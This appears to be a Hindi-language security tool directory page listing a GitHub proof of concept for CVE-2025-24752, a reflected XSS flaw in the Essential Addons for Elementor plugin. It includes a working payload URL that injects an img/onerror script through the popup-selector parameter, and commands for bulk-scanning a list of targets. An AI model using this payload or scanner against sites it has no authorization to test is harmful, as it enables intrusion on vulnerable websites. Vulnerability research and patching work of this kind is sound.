Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
essential-addons-for-elementor-xss-poc — नमस्ते, मैं Chirag Artani हूँ। यह Essential Addons for Elementor में Reflected XSS का POC है, जो 2+ मिलियन साइटों को प्रभावित करता है - CVE-2025-24752 | Kitploit
उपकरण/GitHubGitHub/sachinart/essential-addons-for-elementor-xss-poc
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubsachinart/essential-addons-for-elementor-xss-poc

essential-addons-for-elementor-xss-poc

नमस्ते, मैं Chirag Artani हूँ। यह Essential Addons for Elementor में Reflected XSS का POC है, जो 2+ मिलियन साइटों को प्रभावित करता है - CVE-2025-24752

रिपॉजिटरी देखें
6411 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔍 एलिमेंटर के लिए एसेंशियल ऐडन्स XSS भेद्यता डिटेक्टर

🚨 महत्वपूर्ण जानकारी

यह उपकरण केवल सुरक्षा अनुसंधान और पैचिंग उद्देश्यों के लिए है। इसका उपयोग साइटों को नुकसान पहुंचाने के लिए न करें। यदि आपको भेद्य साइटें मिलती हैं, तो उन्हें जिम्मेदारी से साइट मालिकों को रिपोर्ट करें ताकि वे तुरंत अपडेट कर सकें।

⚠️ भेद्यता विवरण

एलिमेंटर के लिए एसेंशियल ऐडन्स में एक रिफ्लेक्टेड XSS भेद्यता 100K+ वेबसाइटों को प्रभावित करती है जो 6.0.15 से नीचे के संस्करणों का उपयोग कर रही हैं। इसे CVE-2025-24752 निर्दिष्ट किया गया है।

👉 मैनुअल पीओसी

root@kitploit:~
https://target.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1

🖼️ स्क्रीनशॉट

XSS प्रूफ ऑफ कॉन्सेप्ट अलर्ट प्रदर्शन

🔧 आवश्यकताएँ

root@kitploit:~
pip install selenium webdriver-manager

⚙️ उपयोग

root@kitploit:~
python poc.py targets.txt

✅ विशेषताएँ

  • 100% सटीक पहचान: nuclei या httpx उपकरणों के विपरीत, यह स्क्रिप्ट ब्राउज़र में भेद्य पृष्ठ को वास्तव में लोड करके और अलर्ट निष्पादन को देखकर XSS की पुष्टि करती है
  • बल्क स्कैनिंग: कई लक्ष्यों को संसाधित कर सकता है (नोट: ब्राउज़र-आधारित पुष्टि के कारण धीमी होगी)
  • पूर्ण पहचान: एसेट्स में प्लगइन पहचान के लिए Nuclei टेम्पलेट शामिल है

📝 पहचान YAML

एसेट्स में प्लगइन के लिए एक पूर्ण पहचान टेम्पलेट शामिल है: detect-elementor-for-xss.yaml

📚 अतिरिक्त जानकारी और संदर्भ

यह भेद्यता popup-selector क्वेरी तर्क के अपर्याप्त सत्यापन और स्वच्छता के कारण होती है, जिससे एक दुर्भावनापूर्ण मान उपयोगकर्ता पर वापस परिलक्षित हो सकता है। संस्करण 6.0.15 में ठीक किया गया।

अधिक विवरण के लिए: पैचस्टैक लेख

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और सुरक्षात्मक उद्देश्यों के लिए प्रदान किया गया है। किसी भी वेबसाइट की भेद्यता का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें। लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है।

🙏 आभार

इस भेद्यता की पहचान और रिपोर्ट करने वाले जिम्मेदार सुरक्षा शोधकर्ताओं को धन्यवाद।

टूल डाउनलोड करें